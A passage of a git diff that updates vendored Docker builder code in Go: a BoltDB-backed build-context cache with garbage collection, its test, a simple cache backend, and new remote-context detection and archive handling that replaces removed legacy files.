sharedKey) + if err != nil { + return nil, errors.Wrap(err, "failed to create remote context") + } + } + + if err := syncFrom(ctx, sourceRef, transport, id); err != nil { + sourceRef.Release() + return nil, err + } + if err := sourceRef.resetSize(-1); err != nil { + return nil, err + } + return sourceRef, nil + }) + if err != nil { + return nil, err + } + ref := sourceRef.(*cachedSourceRef) + if ref.src == nil { // failsafe + return nil, errors.Errorf("invalid empty pull") + } + wc := &wrappedContext{Source: ref.src, closer: func() error { + ref.Release() + return nil + }} + return wc, nil +} + +// DiskUsage reports how much data is allocated by the cache +func (fsc *FSCache) DiskUsage(ctx context.Context) (int64, error) { + return fsc.store.DiskUsage(ctx) +} + +// Prune allows manually cleaning up the cache +func (fsc *FSCache) Prune(ctx context.Context) (uint64, error) { + return fsc.store.Prune(ctx) +} + +// Close stops the gc and closes the persistent db +func (fsc *FSCache) Close() error { + return fsc.store.Close() +} + +func syncFrom(ctx context.Context, cs *cachedSourceRef, transport Transport, id RemoteIdentifier) (retErr error) { + src := cs.src + if src == nil { + src = remotecontext.NewCachableSource(cs.Dir()) + } + + if !cs.cached { + if err := cs.storage.db.View(func(tx *bolt.Tx) error { + b := tx.Bucket([]byte(id.Key())) + dt := b.Get([]byte(cacheKey)) + if dt != nil { + if err := src.UnmarshalBinary(dt); err != nil { + return err + } + } else { + return errors.Wrap(src.Scan(), "failed to scan cache records") + } + return nil + }); err != nil { + return err + } + } + + dc := &detectChanges{f: src.HandleChange} + + // todo: probably send a bucket to `Copy` and let it return source + // but need to make sure that tx is safe + if err := transport.Copy(ctx, id, cs.Dir(), dc); err != nil { + return errors.Wrapf(err, "failed to copy to %s", cs.Dir()) + } + + if !dc.supported { + if err := src.Scan(); err != nil { + return errors.Wrap(err, "failed to scan cache records after transfer") + } + } + cs.cached = true + cs.src = src + return cs.storage.db.Update(func(tx *bolt.Tx) error { + dt, err := src.MarshalBinary() + if err != nil { + return err + } + b := tx.Bucket([]byte(id.Key())) + return b.Put([]byte(cacheKey), dt) + }) +} + +type fsCacheStore struct { + mu sync.Mutex + sources map[string]*cachedSource + db *bolt.DB + fs Backend + gcTimer *time.Timer + gcPolicy GCPolicy +} + +// CachePolicy defines policy for keeping a resource in cache +type CachePolicy struct { + Priority int + LastUsed time.Time +} + +func defaultCachePolicy() CachePolicy { + return CachePolicy{Priority: 10, LastUsed: time.Now()} +} + +func newFSCacheStore(opt Opt) (*fsCacheStore, error) { + if err := os.MkdirAll(opt.Root, 0700); err != nil { + return nil, err + } + p := filepath.Join(opt.Root, dbFile) + db, err := bolt.Open(p, 0600, nil) + if err != nil { + return nil, errors.Wrap(err, "failed to open database file %s") + } + s := &fsCacheStore{db: db, sources: make(map[string]*cachedSource), fs: opt.Backend, gcPolicy: opt.GCPolicy} + db.View(func(tx *bolt.Tx) error { + return tx.ForEach(func(name []byte, b *bolt.Bucket) error { + dt := b.Get([]byte(metaKey)) + if dt == nil { + return nil + } + var sm sourceMeta + if err := json.Unmarshal(dt, &sm); err != nil { + return err + } + dir, err := s.fs.Get(sm.BackendID) + if err != nil { + return err // TODO: handle gracefully + } + source := &cachedSource{ + refs: make(map[*cachedSourceRef]struct{}), + id: string(name), + dir: dir, + sourceMeta: sm, + storage: s, + } + s.sources[string(name)] = source + return nil + }) + }) + + s.gcTimer = s.startPeriodicGC(5 * time.Minute) + return s, nil +} + +func (s *fsCacheStore) startPeriodicGC(interval time.Duration) *time.Timer { + var t *time.Timer + t = time.AfterFunc(interval, func() { + if err := s.GC(); err != nil { + logrus.Errorf("build gc error: %v", err) + } + t.Reset(interval) + }) + return t +} + +func (s *fsCacheStore) Close() error { + s.gcTimer.Stop() + return s.db.Close() +} + +func (s *fsCacheStore) New(id, sharedKey string) (*cachedSourceRef, error) { + s.mu.Lock() + defer s.mu.Unlock() + var ret *cachedSource + if err := s.db.Update(func(tx *bolt.Tx) error { + b, err := tx.CreateBucket([]byte(id)) + if err != nil { + return err + } + backendID := stringid.GenerateRandomID() + dir, err := s.fs.Get(backendID) + if err != nil { + return err + } + source := &cachedSource{ + refs: make(map[*cachedSourceRef]struct{}), + id: id, + dir: dir, + sourceMeta: sourceMeta{ + BackendID: backendID, + SharedKey: sharedKey, + CachePolicy: defaultCachePolicy(), + }, + storage: s, + } + dt, err := json.Marshal(source.sourceMeta) + if err != nil { + return err + } + if err := b.Put([]byte(metaKey), dt); err != nil { + return err + } + s.sources[id] = source + ret = source + return nil + }); err != nil { + return nil, err + } + return ret.getRef(), nil +} + +func (s *fsCacheStore) Rebase(sharedKey, newid string) (*cachedSourceRef, error) { + s.mu.Lock() + defer s.mu.Unlock() + var ret *cachedSource + for id, snap := range s.sources { + if snap.SharedKey == sharedKey && len(snap.refs) == 0 { + if err := s.db.Update(func(tx *bolt.Tx) error { + if err := tx.DeleteBucket([]byte(id)); err != nil { + return err + } + b, err := tx.CreateBucket([]byte(newid)) + if err != nil { + return err + } + snap.id = newid + snap.CachePolicy = defaultCachePolicy() + dt, err := json.Marshal(snap.sourceMeta) + if err != nil { + return err + } + if err := b.Put([]byte(metaKey), dt); err != nil { + return err + } + delete(s.sources, id) + s.sources[newid] = snap + return nil + }); err != nil { + return nil, err + } + ret = snap + break + } + } + if ret == nil { + return nil, errors.Errorf("no candidate for rebase") + } + return ret.getRef(), nil +} + +func (s *fsCacheStore) Get(id string) (*cachedSourceRef, error) { + s.mu.Lock() + defer s.mu.Unlock() + src, ok := s.sources[id] + if !ok { + return nil, errors.Errorf("not found") + } + return src.getRef(), nil +} + +// DiskUsage reports how much data is allocated by the cache +func (s *fsCacheStore) DiskUsage(ctx context.Context) (int64, error) { + s.mu.Lock() + defer s.mu.Unlock() + var size int64 + + for _, snap := range s.sources { + if len(snap.refs) == 0 { + ss, err := snap.getSize(ctx) + if err != nil { + return 0, err + } + size += ss + } + } + return size, nil +} + +// Prune allows manually cleaning up the cache +func (s *fsCacheStore) Prune(ctx context.Context) (uint64, error) { + s.mu.Lock() + defer s.mu.Unlock() + var size uint64 + + for id, snap := range s.sources { + select { + case <-ctx.Done(): + logrus.Debugf("Cache prune operation cancelled, pruned size: %d", size) + // when the context is cancelled, only return current size and nil + return size, nil + default: + } + if len(snap.refs) == 0 { + ss, err := snap.getSize(ctx) + if err != nil { + return size, err + } + if err := s.delete(id); err != nil { + return size, errors.Wrapf(err, "failed to delete %s", id) + } + size += uint64(ss) + } + } + return size, nil +} + +// GC runs a garbage collector on FSCache +func (s *fsCacheStore) GC() error { + s.mu.Lock() + defer s.mu.Unlock() + var size uint64 + + ctx := context.Background() + cutoff := time.Now().Add(-s.gcPolicy.MaxKeepDuration) + var blacklist []*cachedSource + + for id, snap := range s.sources { + if len(snap.refs) == 0 { + if cutoff.After(snap.CachePolicy.LastUsed) { + if err := s.delete(id); err != nil { + return errors.Wrapf(err, "failed to delete %s", id) + } + } else { + ss, err := snap.getSize(ctx) + if err != nil { + return err + } + size += uint64(ss) + blacklist = append(blacklist, snap) + } + } + } + + sort.Sort(sortableCacheSources(blacklist)) + for _, snap := range blacklist { + if size <= s.gcPolicy.MaxSize { + break + } + ss, err := snap.getSize(ctx) + if err != nil { + return err + } + if err := s.delete(snap.id); err != nil { + return errors.Wrapf(err, "failed to delete %s", snap.id) + } + size -= uint64(ss) + } + return nil +} + +// keep mu while calling this +func (s *fsCacheStore) delete(id string) error { + src, ok := s.sources[id] + if !ok { + return nil + } + if len(src.refs) > 0 { + return errors.Errorf("can't delete %s because it has active references", id) + } + delete(s.sources, id) + if err := s.db.Update(func(tx *bolt.Tx) error { + return tx.DeleteBucket([]byte(id)) + }); err != nil { + return err + } + return s.fs.Remove(src.BackendID) +} + +type sourceMeta struct { + SharedKey string + BackendID string + CachePolicy CachePolicy + Size int64 +} + +type cachedSource struct { + sourceMeta + refs map[*cachedSourceRef]struct{} + id string + dir string + src *remotecontext.CachableSource + storage *fsCacheStore + cached bool // keep track if cache is up to date +} + +type cachedSourceRef struct { + *cachedSource +} + +func (cs *cachedSource) Dir() string { + return cs.dir +} + +// hold storage lock before calling +func (cs *cachedSource) getRef() *cachedSourceRef { + ref := &cachedSourceRef{cachedSource: cs} + cs.refs[ref] = struct{}{} + return ref +} + +// hold storage lock before calling +func (cs *cachedSource) getSize(ctx context.Context) (int64, error) { + if cs.sourceMeta.Size < 0 { + ss, err := directory.Size(ctx, cs.dir) + if err != nil { + return 0, err + } + if err := cs.resetSize(ss); err != nil { + return 0, err + } + return ss, nil + } + return cs.sourceMeta.Size, nil +} + +func (cs *cachedSource) resetSize(val int64) error { + cs.sourceMeta.Size = val + return cs.saveMeta() +} +func (cs *cachedSource) saveMeta() error { + return cs.storage.db.Update(func(tx *bolt.Tx) error { + b := tx.Bucket([]byte(cs.id)) + dt, err := json.Marshal(cs.sourceMeta) + if err != nil { + return err + } + return b.Put([]byte(metaKey), dt) + }) +} + +func (csr *cachedSourceRef) Release() error { + csr.cachedSource.storage.mu.Lock() + defer csr.cachedSource.storage.mu.Unlock() + delete(csr.cachedSource.refs, csr) + if len(csr.cachedSource.refs) == 0 { + go csr.cachedSource.storage.GC() + } + return nil +} + +type detectChanges struct { + f fsutil.ChangeFunc + supported bool +} + +func (dc *detectChanges) HandleChange(kind fsutil.ChangeKind, path string, fi os.FileInfo, err error) error { + if dc == nil { + return nil + } + return dc.f(kind, path, fi, err) +} + +func (dc *detectChanges) MarkSupported(v bool) { + if dc == nil { + return + } + dc.supported = v +} + +func (dc *detectChanges) ContentHasher() fsutil.ContentHasher { + return newTarsumHash +} + +type wrappedContext struct { + builder.Source + closer func() error +} + +func (wc *wrappedContext) Close() error { + if err := wc.Source.Close(); err != nil { + return err + } + return wc.closer() +} + +type sortableCacheSources []*cachedSource + +// Len is the number of elements in the collection. +func (s sortableCacheSources) Len() int { + return len(s) +} + +// Less reports whether the element with +// index i should sort before the element with index j. +func (s sortableCacheSources) Less(i, j int) bool { + return s[i].CachePolicy.LastUsed.Before(s[j].CachePolicy.LastUsed) +} + +// Swap swaps the elements with indexes i and j. +func (s sortableCacheSources) Swap(i, j int) { + s[i], s[j] = s[j], s[i] +} + +func newTarsumHash(stat *fsutil.Stat) (hash.Hash, error) { + fi := &fsutil.StatInfo{Stat: stat} + p := stat.Path + if fi.IsDir() { + p += string(os.PathSeparator) + } + h, err := archive.FileInfoHeader(p, fi, stat.Linkname) + if err != nil { + return nil, err + } + h.Name = p + h.Uid = int(stat.Uid) + h.Gid = int(stat.Gid) + h.Linkname = stat.Linkname + if stat.Xattrs != nil { + h.Xattrs = make(map[string]string) + for k, v := range stat.Xattrs { + h.Xattrs[k] = string(v) + } + } + + tsh := &tarsumHash{h: h, Hash: sha256.New()} + tsh.Reset() + return tsh, nil +} + +// Reset resets the Hash to its initial state. +func (tsh *tarsumHash) Reset() { + tsh.Hash.Reset() + tarsum.WriteV1Header(tsh.h, tsh.Hash) +} + +type tarsumHash struct { + hash.Hash + h *tar.Header +} diff --git a/vendor/github.com/docker/docker/builder/fscache/fscache_test.go b/vendor/github.com/docker/docker/builder/fscache/fscache_test.go new file mode 100644 index 0000000000..5108d65df1 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/fscache/fscache_test.go @@ -0,0 +1,132 @@ +package fscache // import "github.com/docker/docker/builder/fscache" + +import ( + "context" + "io/ioutil" + "os" + "path/filepath" + "testing" + "time" + + "github.com/moby/buildkit/session/filesync" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestFSCache(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "fscache") + assert.Check(t, err) + defer os.RemoveAll(tmpDir) + + backend := NewNaiveCacheBackend(filepath.Join(tmpDir, "backend")) + + opt := Opt{ + Root: tmpDir, + Backend: backend, + GCPolicy: GCPolicy{MaxSize: 15, MaxKeepDuration: time.Hour}, + } + + fscache, err := NewFSCache(opt) + assert.Check(t, err) + + defer fscache.Close() + + err = fscache.RegisterTransport("test", &testTransport{}) + assert.Check(t, err) + + src1, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo", "data", "bar"}) + assert.Check(t, err) + + dt, err := ioutil.ReadFile(filepath.Join(src1.Root().Path(), "foo")) + assert.Check(t, err) + assert.Check(t, is.Equal(string(dt), "data")) + + // same id doesn't recalculate anything + src2, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo", "data2", "bar"}) + assert.Check(t, err) + assert.Check(t, is.Equal(src1.Root().Path(), src2.Root().Path())) + + dt, err = ioutil.ReadFile(filepath.Join(src1.Root().Path(), "foo")) + assert.Check(t, err) + assert.Check(t, is.Equal(string(dt), "data")) + assert.Check(t, src2.Close()) + + src3, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo2", "data2", "bar"}) + assert.Check(t, err) + assert.Check(t, src1.Root().Path() != src3.Root().Path()) + + dt, err = ioutil.ReadFile(filepath.Join(src3.Root().Path(), "foo2")) + assert.Check(t, err) + assert.Check(t, is.Equal(string(dt), "data2")) + + s, err := fscache.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(s, int64(0))) + + assert.Check(t, src3.Close()) + + s, err = fscache.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(s, int64(5))) + + // new upload with the same shared key shoutl overwrite + src4, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo3", "data3", "bar"}) + assert.Check(t, err) + assert.Check(t, src1.Root().Path() != src3.Root().Path()) + + dt, err = ioutil.ReadFile(filepath.Join(src3.Root().Path(), "foo3")) + assert.Check(t, err) + assert.Check(t, is.Equal(string(dt), "data3")) + assert.Check(t, is.Equal(src4.Root().Path(), src3.Root().Path())) + assert.Check(t, src4.Close()) + + s, err = fscache.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(s, int64(10))) + + // this one goes over the GC limit + src5, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo4", "datadata", "baz"}) + assert.Check(t, err) + assert.Check(t, src5.Close()) + + // GC happens async + time.Sleep(100 * time.Millisecond) + + // only last insertion after GC + s, err = fscache.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(s, int64(8))) + + // prune deletes everything + released, err := fscache.Prune(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(released, uint64(8))) + + s, err = fscache.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(s, int64(0))) +} + +type testTransport struct { +} + +func (t *testTransport) Copy(ctx context.Context, id RemoteIdentifier, dest string, cs filesync.CacheUpdater) error { + testid := id.(*testIdentifier) + return ioutil.WriteFile(filepath.Join(dest, testid.filename), []byte(testid.data), 0600) +} + +type testIdentifier struct { + filename string + data string + sharedKey string +} + +func (t *testIdentifier) Key() string { + return t.filename +} +func (t *testIdentifier) SharedKey() string { + return t.sharedKey +} +func (t *testIdentifier) Transport() string { + return "test" +} diff --git a/vendor/github.com/docker/docker/builder/fscache/naivedriver.go b/vendor/github.com/docker/docker/builder/fscache/naivedriver.go new file mode 100644 index 0000000000..053509aecf --- /dev/null +++ b/vendor/github.com/docker/docker/builder/fscache/naivedriver.go @@ -0,0 +1,28 @@ +package fscache // import "github.com/docker/docker/builder/fscache" + +import ( + "os" + "path/filepath" + + "github.com/pkg/errors" +) + +// NewNaiveCacheBackend is a basic backend implementation for fscache +func NewNaiveCacheBackend(root string) Backend { + return &naiveCacheBackend{root: root} +} + +type naiveCacheBackend struct { + root string +} + +func (tcb *naiveCacheBackend) Get(id string) (string, error) { + d := filepath.Join(tcb.root, id) + if err := os.MkdirAll(d, 0700); err != nil { + return "", errors.Wrapf(err, "failed to create tmp dir for %s", d) + } + return d, nil +} +func (tcb *naiveCacheBackend) Remove(id string) error { + return errors.WithStack(os.RemoveAll(filepath.Join(tcb.root, id))) +} diff --git a/vendor/github.com/docker/docker/builder/git.go b/vendor/github.com/docker/docker/builder/git.go deleted file mode 100644 index 74df244611..0000000000 --- a/vendor/github.com/docker/docker/builder/git.go +++ /dev/null @@ -1,28 +0,0 @@ -package builder - -import ( - "os" - - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/gitutils" -) - -// MakeGitContext returns a Context from gitURL that is cloned in a temporary directory. -func MakeGitContext(gitURL string) (ModifiableContext, error) { - root, err := gitutils.Clone(gitURL) - if err != nil { - return nil, err - } - - c, err := archive.Tar(root, archive.Uncompressed) - if err != nil { - return nil, err - } - - defer func() { - // TODO: print errors? - c.Close() - os.RemoveAll(root) - }() - return MakeTarSumContext(c) -} diff --git a/vendor/github.com/docker/docker/builder/remote.go b/vendor/github.com/docker/docker/builder/remote.go deleted file mode 100644 index f3a4329d16..0000000000 --- a/vendor/github.com/docker/docker/builder/remote.go +++ /dev/null @@ -1,157 +0,0 @@ -package builder - -import ( - "bytes" - "errors" - "fmt" - "io" - "io/ioutil" - "regexp" - - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/httputils" - "github.com/docker/docker/pkg/urlutil" -) - -// When downloading remote contexts, limit the amount (in bytes) -// to be read from the response body in order to detect its Content-Type -const maxPreambleLength = 100 - -const acceptableRemoteMIME = `(?:application/(?:(?:x\-)?tar|octet\-stream|((?:x\-)?(?:gzip|bzip2?|xz)))|(?:text/plain))` - -var mimeRe = regexp.MustCompile(acceptableRemoteMIME) - -// MakeRemoteContext downloads a context from remoteURL and returns it. -// -// If contentTypeHandlers is non-nil, then the Content-Type header is read along with a maximum of -// maxPreambleLength bytes from the body to help detecting the MIME type. -// Look at acceptableRemoteMIME for more details. -// -// If a match is found, then the body is sent to the contentType handler and a (potentially compressed) tar stream is expected -// to be returned. If no match is found, it is assumed the body is a tar stream (compressed or not). -// In either case, an (assumed) tar stream is passed to MakeTarSumContext whose result is returned. -func MakeRemoteContext(remoteURL string, contentTypeHandlers map[string]func(io.ReadCloser) (io.ReadCloser, error)) (ModifiableContext, error) { - f, err := httputils.Download(remoteURL) - if err != nil { - return nil, fmt.Errorf("error downloading remote context %s: %v", remoteURL, err) - } - defer f.Body.Close() - - var contextReader io.ReadCloser - if contentTypeHandlers != nil { - contentType := f.Header.Get("Content-Type") - clen := f.ContentLength - - contentType, contextReader, err = inspectResponse(contentType, f.Body, clen) - if err != nil { - return nil, fmt.Errorf("error detecting content type for remote %s: %v", remoteURL, err) - } - defer contextReader.Close() - - // This loop tries to find a content-type handler for the detected content-type. - // If it could not find one from the caller-supplied map, it tries the empty content-type `""` - // which is interpreted as a fallback handler (usually used for raw tar contexts). - for _, ct := range []string{contentType, ""} { - if fn, ok := contentTypeHandlers[ct]; ok { - defer contextReader.Close() - if contextReader, err = fn(contextReader); err != nil { - return nil, err - } - break - } - } - } - - // Pass through - this is a pre-packaged context, presumably - // with a Dockerfile with the right name inside it. - return MakeTarSumContext(contextReader) -} - -// DetectContextFromRemoteURL returns a context and in certain cases the name of the dockerfile to be used -// irrespective of user input. -// progressReader is only used if remoteURL is actually a URL (not empty, and not a Git endpoint). -func DetectContextFromRemoteURL(r io.ReadCloser, remoteURL string, createProgressReader func(in io.ReadCloser) io.ReadCloser) (context ModifiableContext, dockerfileName string, err error) { - switch { - case remoteURL == "": - context, err = MakeTarSumContext(r) - case urlutil.IsGitURL(remoteURL): - context, err = MakeGitContext(remoteURL) - case urlutil.IsURL(remoteURL): - context, err = MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){ - httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) { - dockerfile, err := ioutil.ReadAll(rc) - if err != nil { - return nil, err - } - - // dockerfileName is set to signal that the remote was interpreted as a single Dockerfile, in which case the caller - // should use dockerfileName as the new name for the Dockerfile, irrespective of any other user input. - dockerfileName = DefaultDockerfileName - - // TODO: return a context without tarsum - r, err := archive.Generate(dockerfileName, string(dockerfile)) - if err != nil { - return nil, err - } - - return ioutil.NopCloser(r), nil - }, - // fallback handler (tar context) - "": func(rc io.ReadCloser) (io.ReadCloser, error) { - return createProgressReader(rc), nil - }, - }) - default: - err = fmt.Errorf("remoteURL (%s) could not be recognized as URL", remoteURL) - } - return -} - -// inspectResponse looks into the http response data at r to determine whether its -// content-type is on the list of acceptable content types for remote build contexts. -// This function returns: -// - a string representation of the detected content-type -// - an io.Reader for the response body -// - an error value which will be non-nil either when something goes wrong while -// reading bytes from r or when the detected content-type is not acceptable. -func inspectResponse(ct string, r io.ReadCloser, clen int64) (string, io.ReadCloser, error) { - plen := clen - if plen <= 0 || plen > maxPreambleLength { - plen = maxPreambleLength - } - - preamble := make([]byte, plen, plen) - rlen, err := r.Read(preamble) - if rlen == 0 { - return ct, r, errors.New("empty response") - } - if err != nil && err != io.EOF { - return ct, r, err - } - - preambleR := bytes.NewReader(preamble) - bodyReader := ioutil.NopCloser(io.MultiReader(preambleR, r)) - // Some web servers will use application/octet-stream as the default - // content type for files without an extension (e.g. 'Dockerfile') - // so if we receive this value we better check for text content - contentType := ct - if len(ct) == 0 || ct == httputils.MimeTypes.OctetStream { - contentType, _, err = httputils.DetectContentType(preamble) - if err != nil { - return contentType, bodyReader, err - } - } - - contentType = selectAcceptableMIME(contentType) - var cterr error - if len(contentType) == 0 { - cterr = fmt.Errorf("unsupported Content-Type %q", ct) - contentType = ct - } - - return contentType, bodyReader, cterr -} - -func selectAcceptableMIME(ct string) string { - return mimeRe.FindString(ct) -} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/archive.go b/vendor/github.com/docker/docker/builder/remotecontext/archive.go new file mode 100644 index 0000000000..6d247f945d --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/archive.go @@ -0,0 +1,125 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "io" + "os" + "path/filepath" + + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/tarsum" + "github.com/pkg/errors" +) + +type archiveContext struct { + root containerfs.ContainerFS + sums tarsum.FileInfoSums +} + +func (c *archiveContext) Close() error { + return c.root.RemoveAll(c.root.Path()) +} + +func convertPathError(err error, cleanpath string) error { + if err, ok := err.(*os.PathError); ok { + err.Path = cleanpath + return err + } + return err +} + +type modifiableContext interface { + builder.Source + // Remove deletes the entry specified by `path`. + // It is usual for directory entries to delete all its subentries. + Remove(path string) error +} + +// FromArchive returns a build source from a tar stream. +// +// It extracts the tar stream to a temporary folder that is deleted as soon as +// the Context is closed. +// As the extraction happens, a tarsum is calculated for every file, and the set of +// all those sums then becomes the source of truth for all operations on this Context. +// +// Closing tarStream has to be done by the caller. +func FromArchive(tarStream io.Reader) (builder.Source, error) { + root, err := ioutils.TempDir("", "docker-builder") + if err != nil { + return nil, err + } + + // Assume local file system. Since it's coming from a tar file. + tsc := &archiveContext{root: containerfs.NewLocalContainerFS(root)} + + // Make sure we clean-up upon error. In the happy case the caller + // is expected to manage the clean-up + defer func() { + if err != nil { + tsc.Close() + } + }() + + decompressedStream, err := archive.DecompressStream(tarStream) + if err != nil { + return nil, err + } + + sum, err := tarsum.NewTarSum(decompressedStream, true, tarsum.Version1) + if err != nil { + return nil, err + } + + err = chrootarchive.Untar(sum, root, nil) + if err != nil { + return nil, err + } + + tsc.sums = sum.GetSums() + return tsc, nil +} + +func (c *archiveContext) Root() containerfs.ContainerFS { + return c.root +} + +func (c *archiveContext) Remove(path string) error { + _, fullpath, err := normalize(path, c.root) + if err != nil { + return err + } + return c.root.RemoveAll(fullpath) +} + +func (c *archiveContext) Hash(path string) (string, error) { + cleanpath, fullpath, err := normalize(path, c.root) + if err != nil { + return "", err + } + + rel, err := c.root.Rel(c.root.Path(), fullpath) + if err != nil { + return "", convertPathError(err, cleanpath) + } + + // Use the checksum of the followed path(not the possible symlink) because + // this is the file that is actually copied. + if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil { + return tsInfo.Sum(), nil + } + // We set sum to path by default for the case where GetFile returns nil. + // The usual case is if relative path is empty. + return path, nil // backwards compat TODO: see if really needed +} + +func normalize(path string, root containerfs.ContainerFS) (cleanPath, fullPath string, err error) { + cleanPath = root.Clean(string(root.Separator()) + path)[1:] + fullPath, err = root.ResolveScopedPath(path, true) + if err != nil { + return "", "", errors.Wrapf(err, "forbidden path outside the build context: %s (%s)", path, cleanPath) + } + return +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/detect.go b/vendor/github.com/docker/docker/builder/remotecontext/detect.go new file mode 100644 index 0000000000..aaace269e9 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/detect.go @@ -0,0 +1,180 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "bufio" + "fmt" + "io" + "os" + "strings" + + "github.com/containerd/continuity/driver" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/dockerignore" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/urlutil" + "github.com/moby/buildkit/frontend/dockerfile/parser" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// ClientSessionRemote is identifier for client-session context transport +const ClientSessionRemote = "client-session" + +// Detect returns a context and dockerfile from remote location or local +// archive. progressReader is only used if remoteURL is actually a URL +// (not empty, and not a Git endpoint). +func Detect(config backend.BuildConfig) (remote builder.Source, dockerfile *parser.Result, err error) { + remoteURL := config.Options.RemoteContext + dockerfilePath := config.Options.Dockerfile + + switch { + case remoteURL == "": + remote, dockerfile, err = newArchiveRemote(config.Source, dockerfilePath) + case remoteURL == ClientSessionRemote: + res, err := parser.Parse(config.Source) + if err != nil { + return nil, nil, err + } + return nil, res, nil + case urlutil.IsGitURL(remoteURL): + remote, dockerfile, err = newGitRemote(remoteURL, dockerfilePath) + case urlutil.IsURL(remoteURL): + remote, dockerfile, err = newURLRemote(remoteURL, dockerfilePath, config.ProgressWriter.ProgressReaderFunc) + default: + err = fmt.Errorf("remoteURL (%s) could not be recognized as URL", remoteURL) + } + return +} + +func newArchiveRemote(rc io.ReadCloser, dockerfilePath string) (builder.Source, *parser.Result, error) { + defer rc.Close() + c, err := FromArchive(rc) + if err != nil { + return nil, nil, err + } + + return withDockerfileFromContext(c.(modifiableContext), dockerfilePath) +} + +func withDockerfileFromContext(c modifiableContext, dockerfilePath string) (builder.Source, *parser.Result, error) { + df, err := openAt(c, dockerfilePath) + if err != nil { + if os.IsNotExist(err) { + if dockerfilePath == builder.DefaultDockerfileName { + lowercase := strings.ToLower(dockerfilePath) + if _, err := StatAt(c, lowercase); err == nil { + return withDockerfileFromContext(c, lowercase) + } + } + return nil, nil, errors.Errorf("Cannot locate specified Dockerfile: %s", dockerfilePath) // backwards compatible error + } + c.Close() + return nil, nil, err + } + + res, err := readAndParseDockerfile(dockerfilePath, df) + if err != nil { + return nil, nil, err + } + + df.Close() + + if err := removeDockerfile(c, dockerfilePath); err != nil { + c.Close() + return nil, nil, err + } + + return c, res, nil +} + +func newGitRemote(gitURL string, dockerfilePath string) (builder.Source, *parser.Result, error) { + c, err := MakeGitContext(gitURL) // TODO: change this to NewLazySource + if err != nil { + return nil, nil, err + } + return withDockerfileFromContext(c.(modifiableContext), dockerfilePath) +} + +func newURLRemote(url string, dockerfilePath string, progressReader func(in io.ReadCloser) io.ReadCloser) (builder.Source, *parser.Result, error) { + contentType, content, err := downloadRemote(url) + if err != nil { + return nil, nil, err + } + defer content.Close() + + switch contentType { + case mimeTypes.TextPlain: + res, err := parser.Parse(progressReader(content)) + return nil, res, err + default: + source, err := FromArchive(progressReader(content)) + if err != nil { + return nil, nil, err + } + return withDockerfileFromContext(source.(modifiableContext), dockerfilePath) + } +} + +func removeDockerfile(c modifiableContext, filesToRemove ...string) error { + f, err := openAt(c, ".dockerignore") + // Note that a missing .dockerignore file isn't treated as an error + switch { + case os.IsNotExist(err): + return nil + case err != nil: + return err + } + excludes, err := dockerignore.ReadAll(f) + if err != nil { + f.Close() + return err + } + f.Close() + filesToRemove = append([]string{".dockerignore"}, filesToRemove...) + for _, fileToRemove := range filesToRemove { + if rm, _ := fileutils.Matches(fileToRemove, excludes); rm { + if err := c.Remove(fileToRemove); err != nil { + logrus.Errorf("failed to remove %s: %v", fileToRemove, err) + } + } + } + return nil +} + +func readAndParseDockerfile(name string, rc io.Reader) (*parser.Result, error) { + br := bufio.NewReader(rc) + if _, err := br.Peek(1); err != nil { + if err == io.EOF { + return nil, errors.Errorf("the Dockerfile (%s) cannot be empty", name) + } + return nil, errors.Wrap(err, "unexpected error reading Dockerfile") + } + return parser.Parse(br) +} + +func openAt(remote builder.Source, path string) (driver.File, error) { + fullPath, err := FullPath(remote, path) + if err != nil { + return nil, err + } + return remote.Root().Open(fullPath) +} + +// StatAt is a helper for calling Stat on a path from a source +func StatAt(remote builder.Source, path string) (os.FileInfo, error) { + fullPath, err := FullPath(remote, path) + if err != nil { + return nil, err + } + return remote.Root().Stat(fullPath) +} + +// FullPath is a helper for getting a full path for a path from a source +func FullPath(remote builder.Source, path string) (string, error) { + fullPath, err := remote.Root().ResolveScopedPath(path, true) + if err != nil { + return "", fmt.Errorf("Forbidden path outside the build context: %s (%s)", path, fullPath) // backwards compat with old error + } + return fullPath, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerignore_test.go b/vendor/github.com/docker/docker/builder/remotecontext/detect_test.go similarity index 58% rename from vendor/github.com/docker/docker/builder/dockerignore_test.go rename to vendor/github.com/docker/docker/builder/remotecontext/detect_test.go index 3c0ceda4cf..04b7686c7a 100644 --- a/vendor/github.com/docker/docker/builder/dockerignore_test.go +++ b/vendor/github.com/docker/docker/builder/remotecontext/detect_test.go @@ -1,17 +1,27 @@ -package builder +package remotecontext // import 